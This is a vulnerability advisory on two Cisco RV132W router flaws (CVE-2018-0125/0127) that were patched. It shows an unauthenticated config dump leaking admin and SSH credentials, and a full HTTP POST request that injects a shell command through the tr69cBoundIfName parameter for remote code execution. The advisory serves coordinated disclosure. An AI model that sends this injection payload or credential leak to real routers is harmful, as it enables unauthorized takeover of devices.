SSD Advisory – Hack2Win – Cisco RV132W Multiple Vulnerabilities
Credit to Author: SSD / Maor Schwartz| Date: Sun, 11 Feb 2018 06:10:03 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
See our full scope at: https://blogs.securiteam.com/index.php/product_scope
Vulnerabilities Summary
The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8
The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.”
The vulnerabilities found are:
- Information Disclosure That Leads to Password Disclosure
- Unauthenticated WAN Remote Code Execution
Credit
A security researcher from, NHSC, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
Cisco were informed of the vulnerabilities and released patches to address them: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x
CVE: CVE-2018-0125 / CVE-2018-0127
Vulnerabilities details
Information Disclosure that Leads to Password Disclosure
User controlled input is not sufficiently filtered, unauthenticated user can access the following page:
The output will include the admin SSH password (base64)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | <AdminUserName>redalert</AdminUserName> <AdminPassword>61eac78956b08e9b7c499691eddbe2e2</AdminPassword> <AdminPasswordHash>(null)</AdminPasswordHash> <AdminCliEnable>TRUE</AdminCliEnable> <SupportUserName>support</SupportUserName> <SupportPassword>support</SupportPassword> <SupportPasswordHash>(null)</SupportPasswordHash> <SupportCliEnable>TRUE</SupportCliEnable> <UserUserName>user</UserUserName> <UserPassword>user</UserPassword> <UserPasswordHash>(null)</UserPasswordHash> <UserCliEnable>TRUE</UserCliEnable> <logintimeout>30</logintimeout> <SetAdminUser>TRUE</SetAdminUser> <SetGuestUser>FALSE</SetGuestUser> <EnableAdminUser>TRUE</EnableAdminUser> <EnableGuestUser>FALSE</EnableGuestUser> <GuestUserName>guest</GuestUserName> <GuestPassword>574ea313a3b02211d193d01606942111</GuestPassword> <GuestPasswordHash>(null)</GuestPasswordHash> <GuestCliEnable>TRUE</GuestCliEnable> <GuestUserIsInUse>FALSE</GuestUserIsInUse> <FirstLogin>TRUE</FirstLogin> <GuestLoginTimeout>30</GuestLoginTimeout> <loginchecked>0</loginchecked> <sshpass>cmVkYWxlcnQxMzIkAA==</sshpass> |
Decoding: “cmVkYWxlcnQxMzIkAA==” base64 decodes to “redalert132$” which is our test unit password.
Unauthenticated WAN Remote Code Execution
User controlled input is not sufficiently filtered, unauthenticated user can access the following page:
1 | http://[TARGET_IP]/tr69cfg.cgi |
By sending POST request with modify parameter tr69cBoundIfName= an unauthenticated user can execute arbitrary code on the victims router
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | === POST /tr69cfg.cgi HTTP/1.1 Host: 192.168.1.1 User–Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/2010010 1 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate Content–Type: application/x–www–form–urlencoded Content–Length: 627 Referer: http://192.168.1.1/tr69cfg.cgi Connection: close Upgrade–Insecure–Requests: 1 submit_button=Basic_config&tr69cEnable=1&tr69cInformEnable=1&ipvEnable=0&tr69cInformInterval=300&tr69cAcsURL=http%3A%2F%2F192.168.1.1&tr69cAcsUser=admin&tr69cAcsPwd=admin&tr69cConnReqUser=admin&tr69cConnReqPwd=admin&tr69cConnReqPort=7547&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0&tr69cAcsCert=&tr69cCpeCert=&downloadFileType=&tr69cBoundIfName=;COMMAND–TO–RUN;&tr69cBindInterface=ETH_WAN_R&tr69=on&ipv=on&inform=on&informInterval=300&httpCategory=http%3A%2F%2F&acsURL=192.168.1.1&acsUser=admin&acsPwd=admin&debug=on&FileType=on&connReqAuth=on&connReqUser=admin&connReqPwd=admin&connReqPort=7547&WANInterface=eth0.1 === |